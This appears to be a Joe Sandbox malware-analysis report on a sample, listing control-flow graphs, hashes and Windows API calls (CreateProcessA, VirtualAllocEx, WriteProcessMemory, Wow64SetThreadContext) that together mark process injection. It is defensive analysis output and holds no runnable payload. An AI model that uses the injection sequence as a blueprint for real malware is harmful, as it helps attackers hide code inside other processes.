                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 f3ee30-f3ee88 call f3caf8 4 f3fc66-f3fc70 0->4 5 f3ee8e-f3ef27 call f3cb04 0->5 7 f3fc72 4->7 8 f3fc77-f3fc7e 4->8 13 f3fc3c-f3fc4e 5->13 7->8 14 f3fc54 13->14 15 f3ef2c-f3ef4e call f3cb20 13->15 14->4 18 f3fc36-f3fc39 15->18 19 f3ef54-f3ef5c 15->19 18->13 20 f3fc14-f3fc30 19->20 20->18 21 f3ef61-f3ef6d 20->21 22 f3ef73-f3ef78 21->22 23 f3fc56-f3fc5b 21->23 24 f3ef9a-f3ef9c 22->24 25 f3ef7a-f3ef81 22->25 23->4 28 f3efa2-f3efb1 24->28 25->23 26 f3ef87-f3ef98 25->26 26->28 29 f3efb7-f3efdf call f3cb20 28->29 30 f3fc0e 28->30 29->30 33 f3efe5-f3eff7 29->33 30->20 35 f3eff9-f3f006 33->35 36 f3f01f-f3f021 33->36 38 f3f008 35->38 39 f3f00e-f3f010 35->39 37 f3f027-f3f036 36->37 37->30 41 f3f03c-f3f068 call f3cb20 37->41 42 f3f012 38->42 43 f3f00a-f3f00c 38->43 40 f3f017-f3f01d 39->40 40->37 41->30 46 f3f06e-f3f075 41->46 42->40 43->39 43->42 46->23 47 f3f07b-f3f07f 46->47 48 f3f081-f3f088 47->48 49 f3f0a0-f3f0a2 47->49 48->23 50 f3f08e-f3f09e 48->50 51 f3f0a8-f3f0b7 49->51 50->51 51->30 52 f3f0bd-f3f104 call f3cb20 51->52 55 f3f106-f3f116 52->55 56 f3f11c-f3f123 52->56 55->56 57 f3f130-f3f132 56->57 58 f3f125 56->58 62 f3f139-f3f141 57->62 60 f3f127-f3f12e 58->60 61 f3f134 58->61 60->57 60->61 61->62 62->30 63 f3f147-f3f192 call f3cb2c 62->63 69 f3f1b3-f3f1be 63->69 70 f3f1c0-f3f2fe call f3cb38 * 2 call f3cb20 69->70 71 f3f194-f3f1b2 LdrInitializeThunk 69->71 70->30 86 f3f304-f3f32e 70->86 71->69 86->30 88 f3f334-f3f356 86->88 89 f3f358-f3f35a 88->89 90 f3f35c 88->90 91 f3f361-f3f369 89->91 90->91 92 f3f373-f3f3db 91->92 93 f3f36b-f3f36d 91->93 92->23 97 f3f3e1-f3f3f4 92->97 93->92 98 f3f400-f3f456 97->98 99 f3f3f6 97->99 103 f3f5c0-f3f5d4 98->103 99->98 104 f3f45b-f3f498 call f3cb20 103->104 105 f3f5da-f3f5ec 103->105 120 f3f4a6-f3f4a8 104->120 121 f3f49a-f3f4a4 104->121 105->23 106 f3f5f2-f3f612 105->106 107 f3f630-f3f632 106->107 108 f3f614-f3f622 106->108 110 f3f638-f3f647 107->110 108->110 111 f3f649-f3f64b 110->111 112 f3f64d-f3f694 110->112 111->112 119 f3f6dd-f3f6eb 112->119 123 f3f696-f3f69f 119->123 124 f3f6ed-f3f701 119->124 122 f3f4bb-f3f4d9 120->122 121->120 125 f3f4aa-f3f4b4 121->125 135 f3f4e0-f3f4e8 122->135 123->23 128 f3f6a5-f3f6c6 123->128 129 f3f703 124->129 130 f3f709-f3f73e 124->130 126 f3f4b6-f3f4b9 125->126 127 f3f4db 125->127 126->122 127->135 132 f3f6d2-f3f6dc 128->132 133 f3f6c8-f3f6d0 128->133 129->130 137 f3f7c0-f3f7fc 130->137 138 f3f744-f3f78b call f3cb20 130->138 132->119 133->132 135->103 144 f3fbf4-f3fc08 137->144 138->137 145 f3f78d-f3f7b3 call f3cb2c 138->145 144->30 146 f3f801-f3f810 144->146 145->137 146->23 149 f3f816-f3f882 146->149 150 f3f884-f3f88c 149->150 151 f3f88e-f3f894 149->151 150->151 152 f3f896-f3f89c 151->152 153 f3f8ac-f3f8b9 151->153 152->153 154 f3f89e-f3f8aa 152->154 155 f3f8c0-f3f8c5 153->155 154->153 156 f3f8bb 154->156 157 f3f99b-f3fa1f call f3cb20 155->157 158 f3f8cb-f3f995 call f30408 155->158 156->155 168 f3fa21-f3fa33 157->168 169 f3fa4c 157->169 158->157 172 f3fa35-f3fa37 168->172 173 f3fa39-f3fa3b 168->173 171 f3fa51-f3fa56 169->171 177 f3fb95-f3fbda 171->177 178 f3fa5c-f3fa7f 171->178 172->173 174 f3fa3d 172->174 176 f3fa42-f3fa4a 173->176 174->176 176->171 186 f3fbee 177->186 187 f3fbdc-f3fbe8 177->187 182 f3fb7b-f3fb8f 178->182 182->177 185 f3fa84-f3faf7 call f3cb20 call f3cb2c 182->185 195 f3fb72-f3fb75 185->195 196 f3faf9-f3fb04 185->196 186->144 187->186 195->182 198 f3fb51-f3fb5d 196->198 199 f3fb65-f3fb67 198->199 200 f3fb5f 198->200 203 f3fb6e-f3fb70 199->203 201 f3fb61-f3fb63 200->201 202 f3fb69 200->202 201->199 201->202 202->203 203->195 204 f3fb06-f3fb1f 203->204 205 f3fb21-f3fb2a 204->205 206 f3fb50 204->206 205->23 207 f3fb30-f3fb46 205->207 206->198 207->23 208 f3fb4c 207->208 208->206
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 2fb68ea7708eabd108d7e6637ec9a5278a5808df63fa27216acb245213d7ef04
                                                • Instruction ID: 430d150040943db2cc8bb1a271ce796c9bd6cb8eafcdb52e0ed9afb274c37a56
                                                • Opcode Fuzzy Hash: 2fb68ea7708eabd108d7e6637ec9a5278a5808df63fa27216acb245213d7ef04
                                                • Instruction Fuzzy Hash: 0E82C371E002298FDB64CF69C880BEDB7F2BF88314F1481EAD549AB255DB349E859F50
                                                Function 00F3D268 Relevance: 1.7, Strings: 1, Instructions: 473COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 331 f3d268-f3d33b call f39178 421 f3d33e call f3cee0 331->421 422 f3d33e call f3ced6 331->422 337 f3d340-f3d356 338 f3d369-f3d390 337->338 339 f3d358-f3d364 337->339 344 f3d396-f3d3d1 338->344 345 f3da79 338->345 340 f3dade-f3dae2 339->340 342 f3dae4 call f39178 340->342 343 f3dae9-f3daf2 340->343 342->343 347 f3da7e-f3daaf 344->347 351 f3d3d7-f3d404 344->351 345->347 433 f3d407 call f3c6b0 351->433 434 f3d407 call f3c6b8 351->434 353 f3d409-f3d413 354 f3d426-f3d437 353->354 355 f3d415-f3d421 353->355 354->347 356 f3d43d-f3d45f 354->356 355->340 356->345 357 f3d465-f3d497 356->357 359 f3d4aa-f3d4d1 357->359 360 f3d499-f3d4a5 357->360 361 f3d4d3-f3d50a 359->361 362 f3d51d-f3d52a 359->362 360->340 361->362 365 f3d50c-f3d518 361->365 362->345 363 f3d530-f3d54e 362->363 363->345 367 f3d554-f3d597 363->367 365->340 428 f3d59a call f3cb6a 367->428 429 f3d59a call f3cb98 367->429 369 f3d59c-f3d5ca 370 f3d5dd-f3d606 369->370 371 f3d5cc-f3d5d8 369->371 431 f3d609 call f3cc50 370->431 432 f3d609 call f3cc58 370->432 371->340 372 f3d60b-f3d627 373 f3d63a-f3d649 372->373 374 f3d629-f3d635 372->374 373->345 375 f3d64f-f3d662 373->375 374->340 375->345 376 f3d668-f3d689 375->376 376->345 378 f3d68f-f3d6a9 376->378 379 f3d85b-f3d880 378->379 380 f3d6af-f3d6bf 378->380 379->345 384 f3d886-f3d89f 379->384 380->345 381 f3d6c5-f3d6e6 380->381 381->345 385 f3d6ec-f3d70d 381->385 423 f3d8a2 call f3cc50 384->423 424 f3d8a2 call f3cc58 384->424 385->345 390 f3d713-f3d74c 385->390 386 f3d8a4-f3d8c0 388 f3d8d3-f3d8e0 386->388 389 f3d8c2-f3d8ce 386->389 388->345 391 f3d8e6-f3d918 388->391 389->340 396 f3d752-f3d762 390->396 397 f3d817-f3d827 390->397 394 f3d92a-f3d93d 391->394 395 f3d91a-f3d924 391->395 394->345 398 f3d943-f3d94d 394->398 395->394 396->345 400 f3d768-f3d76b 396->400 397->345 399 f3d82d-f3d843 397->399 398->347 401 f3d953-f3d972 398->401 399->345 402 f3d849-f3d855 399->402 400->345 403 f3d771-f3d7bd 400->403 435 f3d975 call f3c6b0 401->435 436 f3d975 call f3c6b8 401->436 402->379 402->380 403->345 409 f3d7c3-f3d7e3 403->409 404 f3d977-f3d981 406 f3d983-f3d98f 404->406 407 f3d994-f3d9a7 404->407 406->340 419 f3d9aa call f3c602 407->419 420 f3d9aa call f3c608 407->420 425 f3d7e6 call f3cc50 409->425 426 f3d7e6 call f3cc58 409->426 410 f3d9ac-f3d9b7 411 f3d9ca-f3da0b call f3dc72 call f3e3d1 410->411 412 f3d9b9-f3d9c5 410->412 417 f3da11-f3da20 411->417 412->340 413 f3d7e8-f3d804 413->397 414 f3d806-f3d812 413->414 414->340 417->345 418 f3da22-f3da35 417->418 418->340 419->410 420->410 421->337 422->337 423->386 424->386 425->413 426->413 428->369 429->369 431->372 432->372 433->353 434->353 435->404 436->404
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Q
                                                • API String ID: 0-3463352047
                                                • Opcode ID: ba6c8875b29b1374c66045828cf6187715f6f50a415152b8ee3f5add9463c379
                                                • Instruction ID: b2bc318a026e5c655b71e169dbb37928f7fd14c868849639ed081edcc5b92892
                                                • Opcode Fuzzy Hash: ba6c8875b29b1374c66045828cf6187715f6f50a415152b8ee3f5add9463c379
                                                • Instruction Fuzzy Hash: 4432C5B0D00218CFEB64CFA9D944BDDB7B2BB88314F14C19AD018B7295D7799A85DF24
                                                Function 00F3CB04 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00F3EEC7), ref: 00F3FD9F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 6f3a6f31e0f9adba314bcedda1a5ee9db58d39d0c68d31a1985a222c49bf8718
                                                • Instruction ID: ba017ed6ece09a8dd293006deabfc1bfd1370fd32b445a0fb4c15d917dead90b
                                                • Opcode Fuzzy Hash: 6f3a6f31e0f9adba314bcedda1a5ee9db58d39d0c68d31a1985a222c49bf8718
                                                • Instruction Fuzzy Hash: 39110FB1D0065A9BDB00DF9AC948B9EFBF4FB48324F10816AD918B7240D3B4A904CFE1
                                                Function 00F32F60 Relevance: .4, Instructions: 430COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d185b4e464592032b931d69881fef23a576e74ffcf51ee531c04df6700b701f6
                                                • Instruction ID: 35d9c54035f2a518f34057919bf0aac007ec2e6f95377d6cec010737708c61cb
                                                • Opcode Fuzzy Hash: d185b4e464592032b931d69881fef23a576e74ffcf51ee531c04df6700b701f6
                                                • Instruction Fuzzy Hash: 48F16C70A002198FDB18DFA9D8947AE7BB6BF88310F248159E816EB395DF34DE41DB50
                                                Function 00F33698 Relevance: .4, Instructions: 350COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78bff7a08adb2e273cfd56390f71812a56b257a8d92a02d97d158483f68ac0dc
                                                • Instruction ID: 3a483cdeac8656d780dc7e1cfddea30c389e569f99c225e824e2a7291f7b33ec
                                                • Opcode Fuzzy Hash: 78bff7a08adb2e273cfd56390f71812a56b257a8d92a02d97d158483f68ac0dc
                                                • Instruction Fuzzy Hash: B3E13B75E00219DFCB14CFA9C884AADBBB6BF88321F158169E845EB361D734DE41EB50
                                                Function 00F3CED6 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 209 f3ced6-f3ced9 210 f3cec7-f3cec8 209->210 211 f3cedb-f3cf75 209->211 213 f3cf77-f3cf81 211->213 214 f3cfae-f3cfce 211->214 213->214 215 f3cf83-f3cf85 213->215 219 f3cfd0-f3cfda 214->219 220 f3d007-f3d036 214->220 217 f3cf87-f3cf91 215->217 218 f3cfa8-f3cfab 215->218 221 f3cf93 217->221 222 f3cf95-f3cfa4 217->222 218->214 219->220 224 f3cfdc-f3cfde 219->224 228 f3d038-f3d042 220->228 229 f3d06f-f3d129 CreateProcessA 220->229 221->222 222->222 223 f3cfa6 222->223 223->218 225 f3d001-f3d004 224->225 226 f3cfe0-f3cfea 224->226 225->220 230 f3cfee-f3cffd 226->230 231 f3cfec 226->231 228->229 232 f3d044-f3d046 228->232 242 f3d132-f3d1b8 229->242 243 f3d12b-f3d131 229->243 230->230 233 f3cfff 230->233 231->230 234 f3d069-f3d06c 232->234 235 f3d048-f3d052 232->235 233->225 234->229 237 f3d056-f3d065 235->237 238 f3d054 235->238 237->237 239 f3d067 237->239 238->237 239->234 253 f3d1ba-f3d1be 242->253 254 f3d1c8-f3d1cc 242->254 243->242 253->254 257 f3d1c0-f3d1c3 call f3012c 253->257 255 f3d1ce-f3d1d2 254->255 256 f3d1dc-f3d1e0 254->256 255->256 258 f3d1d4-f3d1d7 call f3012c 255->258 259 f3d1e2-f3d1e6 256->259 260 f3d1f0-f3d1f4 256->260 257->254 258->256 259->260 263 f3d1e8-f3d1eb call f3012c 259->263 264 f3d206-f3d20d 260->264 265 f3d1f6-f3d1fc 260->265 263->260 267 f3d224 264->267 268 f3d20f-f3d21e 264->268 265->264 269 f3d225 267->269 268->267 269->269
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F3D116
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c085ee96b8477cf399e6526faad15444d1ca24d07ef81c26a8b65cd0ab00700c
                                                • Instruction ID: 8e9cb7d5106137aa1e913a36e07baa343901b7a75e486103f3c2932f51f3d39e
                                                • Opcode Fuzzy Hash: c085ee96b8477cf399e6526faad15444d1ca24d07ef81c26a8b65cd0ab00700c
                                                • Instruction Fuzzy Hash: 81A16B71D00319CFEB24DFA8D8417EEBBB2BF48324F148169E808A7240DB759985DF91
                                                Function 00F3CEE0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 271 f3cee0-f3cf75 273 f3cf77-f3cf81 271->273 274 f3cfae-f3cfce 271->274 273->274 275 f3cf83-f3cf85 273->275 279 f3cfd0-f3cfda 274->279 280 f3d007-f3d036 274->280 277 f3cf87-f3cf91 275->277 278 f3cfa8-f3cfab 275->278 281 f3cf93 277->281 282 f3cf95-f3cfa4 277->282 278->274 279->280 284 f3cfdc-f3cfde 279->284 288 f3d038-f3d042 280->288 289 f3d06f-f3d129 CreateProcessA 280->289 281->282 282->282 283 f3cfa6 282->283 283->278 285 f3d001-f3d004 284->285 286 f3cfe0-f3cfea 284->286 285->280 290 f3cfee-f3cffd 286->290 291 f3cfec 286->291 288->289 292 f3d044-f3d046 288->292 302 f3d132-f3d1b8 289->302 303 f3d12b-f3d131 289->303 290->290 293 f3cfff 290->293 291->290 294 f3d069-f3d06c 292->294 295 f3d048-f3d052 292->295 293->285 294->289 297 f3d056-f3d065 295->297 298 f3d054 295->298 297->297 299 f3d067 297->299 298->297 299->294 313 f3d1ba-f3d1be 302->313 314 f3d1c8-f3d1cc 302->314 303->302 313->314 317 f3d1c0-f3d1c3 call f3012c 313->317 315 f3d1ce-f3d1d2 314->315 316 f3d1dc-f3d1e0 314->316 315->316 318 f3d1d4-f3d1d7 call f3012c 315->318 319 f3d1e2-f3d1e6 316->319 320 f3d1f0-f3d1f4 316->320 317->314 318->316 319->320 323 f3d1e8-f3d1eb call f3012c 319->323 324 f3d206-f3d20d 320->324 325 f3d1f6-f3d1fc 320->325 323->320 327 f3d224 324->327 328 f3d20f-f3d21e 324->328 325->324 329 f3d225 327->329 328->327 329->329
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F3D116
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 4ec7feb436362abe71e249b60d670e2b32e61c7d79d3ad0c3f6e68464cd27317
                                                • Instruction ID: 97d5df8109df8226aa1d14e3ec95815974c41b73ad1d4d3b59fe6f3e04c7849f
                                                • Opcode Fuzzy Hash: 4ec7feb436362abe71e249b60d670e2b32e61c7d79d3ad0c3f6e68464cd27317
                                                • Instruction Fuzzy Hash: 71915A71D00719CFEB24DFA9D841BEEBBB2BF48324F148169E808A7244DB749985DF91
                                                Function 00F30C10 Relevance: 1.6, APIs: 1, Instructions: 127libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 437 f30c10-f30c29 call f30560 440 f30c31-f30c34 437->440 441 f30c2b-f30c2d 437->441 442 f30c37-f30caf 440->442 444 f30c36 440->444 441->442 443 f30c2f 441->443 447 f30d03-f30d4f LoadLibraryA 442->447 448 f30cb1-f30cd6 442->448 443->444 452 f30d51-f30d59 447->452 453 f30d5a-f30d91 447->453 448->447 451 f30cd8-f30cda 448->451 455 f30cfd-f30d00 451->455 456 f30cdc-f30ce6 451->456 452->453 457 f30d93-f30d97 453->457 458 f30da1 453->458 455->447 459 f30cea-f30cf9 456->459 460 f30ce8 456->460 457->458 462 f30d99-f30d9c call f3012c 457->462 465 f30da2 458->465 459->459 463 f30cfb 459->463 460->459 462->458 463->455 465->465
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 00F30D3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5969b79a50305d3b7e65660cdca0109368443feedc614d5ecb5e0722837fd649
                                                • Instruction ID: 7b1af479b61edbd36414f845f7d266adf48ee24f6c02a6b924884c20660cc452
                                                • Opcode Fuzzy Hash: 5969b79a50305d3b7e65660cdca0109368443feedc614d5ecb5e0722837fd649
                                                • Instruction Fuzzy Hash: A541AC74D047888FDB11CFA9C8A179EBFF1AF49320F14816AD804EB391DBB89845DB51
                                                Function 00F30C50 Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 466 f30c50-f30caf 468 f30d03-f30d4f LoadLibraryA 466->468 469 f30cb1-f30cd6 466->469 473 f30d51-f30d59 468->473 474 f30d5a-f30d91 468->474 469->468 472 f30cd8-f30cda 469->472 476 f30cfd-f30d00 472->476 477 f30cdc-f30ce6 472->477 473->474 478 f30d93-f30d97 474->478 479 f30da1 474->479 476->468 480 f30cea-f30cf9 477->480 481 f30ce8 477->481 478->479 483 f30d99-f30d9c call f3012c 478->483 486 f30da2 479->486 480->480 484 f30cfb 480->484 481->480 483->479 484->476 486->486
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 00F30D3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6093cb34685d35b47fe3959bbd574cf2552bfc28e69d50ee9bee39db0a54c3f7
                                                • Instruction ID: e91a487313b23265b36bc1886ec94f2410fb487342902e1e30813adc4fc6fd22
                                                • Opcode Fuzzy Hash: 6093cb34685d35b47fe3959bbd574cf2552bfc28e69d50ee9bee39db0a54c3f7
                                                • Instruction Fuzzy Hash: E84127B1D006589FDB14CFA9C89579DBBF1FF48320F14812AE818AB394DBB4A841CB91
                                                Function 00F3CC50 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 487 f3cc50-f3cc51 488 f3cc53-f3cca6 487->488 489 f3cc3f-f3cc41 487->489 491 f3ccb6-f3ccf5 WriteProcessMemory 488->491 492 f3cca8-f3ccb4 488->492 494 f3ccf7-f3ccfd 491->494 495 f3ccfe-f3cd2e 491->495 492->491 494->495
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F3CCE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 5078c73a052fa41b112d9a72bfd21702693a3629945dc06de1e0c12f8ee94b69
                                                • Instruction ID: 72fe5ddbafc7a8ce9649b98f3c176f98b91fe09c8009c4f0ac256ce671276116
                                                • Opcode Fuzzy Hash: 5078c73a052fa41b112d9a72bfd21702693a3629945dc06de1e0c12f8ee94b69
                                                • Instruction Fuzzy Hash: B42139B6D003599FDB00CFA9C885BDEBBF5FF48320F10842AE919A7240D7799955DBA0
                                                Function 00F3CB6A Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 499 f3cb6a-f3cb70 500 f3cb72-f3cbaf 499->500 501 f3cbb1-f3cc13 VirtualAllocEx 499->501 500->501 504 f3cc15-f3cc1b 501->504 505 f3cc1c-f3cc41 501->505 504->505
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F3CC06
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 69821fce8bade6d135ecedcd2442f09b696ba9d47981305c2bff1e24c9fa3aec
                                                • Instruction ID: af7c2629f017bc84ff3edb71b4f6cad8c7794acf911bcfb3ddcc0b2885661149
                                                • Opcode Fuzzy Hash: 69821fce8bade6d135ecedcd2442f09b696ba9d47981305c2bff1e24c9fa3aec
                                                • Instruction Fuzzy Hash: E021F172C083898FDB11CFA9C4457DEBFF1EF4A324F18849AD095AB252C7398505CB91
                                                Function 00F3C6B0 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 510 f3c6b0-f3c6b1 511 f3c6b3-f3c703 510->511 512 f3c69f-f3c6a5 510->512 514 f3c713-f3c743 Wow64SetThreadContext 511->514 515 f3c705-f3c711 511->515 517 f3c745-f3c74b 514->517 518 f3c74c-f3c77c 514->518 515->514 517->518
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00F3C736
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: a966a83f5b324e0c131daea0de8fd8827133e870ad38729b2a9526bac76f79bb
                                                • Instruction ID: 3ddcde5f5b6278673549b7aa9b2eabf121c3f1db847baa31e63ce977648d32cb
                                                • Opcode Fuzzy Hash: a966a83f5b324e0c131daea0de8fd8827133e870ad38729b2a9526bac76f79bb
                                                • Instruction Fuzzy Hash: B4215972D002098FDB10DFAAC8857EEBBF4EF88324F14842AD518B7640D7789A45CFA0
                                                Function 00F3C8D0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 522 f3c8d0-f3e35e 526 f3e360-f3e36c 522->526 527 f3e36e-f3e39b SetKernelObjectSecurity 522->527 526->527 528 f3e3a4-f3e3cc 527->528 529 f3e39d-f3e3a3 527->529 529->528
                                                APIs
                                                • SetKernelObjectSecurity.KERNELBASE(?,00000004,00000000,?,?,?,?,?,?,?,?,00F3E212,?), ref: 00F3E38E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: KernelObjectSecurity
                                                • String ID:
                                                • API String ID: 3015937269-0
                                                • Opcode ID: 92226dfcd45988dd5cf58d5a4c63ba5603cf219b4959592b30f5b0449e3b5bc9
                                                • Instruction ID: 25211397e6c5134ab83facbdbbc743b7400bec117dffa1bde3e1ff418f9f6413
                                                • Opcode Fuzzy Hash: 92226dfcd45988dd5cf58d5a4c63ba5603cf219b4959592b30f5b0449e3b5bc9
                                                • Instruction Fuzzy Hash: B9214A71900209CFDB10CFAAC484BDEBBF4EF48320F14842AD458A7281D774A944CFA5
                                                Function 00F3CC58 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 532 f3cc58-f3cca6 534 f3ccb6-f3ccf5 WriteProcessMemory 532->534 535 f3cca8-f3ccb4 532->535 537 f3ccf7-f3ccfd 534->537 538 f3ccfe-f3cd2e 534->538 535->534 537->538
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F3CCE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: da6943bbb336d86823d17ac80627d5e9b5bd85589b6948aa08464a1b942b387b
                                                • Instruction ID: 1b3f004a18bd7724cf1518b9690b40ee925832936708b312aca226f9f09081de
                                                • Opcode Fuzzy Hash: da6943bbb336d86823d17ac80627d5e9b5bd85589b6948aa08464a1b942b387b
                                                • Instruction Fuzzy Hash: 3E2125B1D003599FDB10CFAAC885BDEBBF5FF48320F10842AE919A7240D7789954DBA0
                                                Function 00F3C8DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 542 f3c8dc-f3e35e 545 f3e360-f3e36c 542->545 546 f3e36e-f3e39b SetKernelObjectSecurity 542->546 545->546 547 f3e3a4-f3e3cc 546->547 548 f3e39d-f3e3a3 546->548 548->547
                                                APIs
                                                • SetKernelObjectSecurity.KERNELBASE(?,00000004,00000000,?,?,?,?,?,?,?,?,00F3E212,?), ref: 00F3E38E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
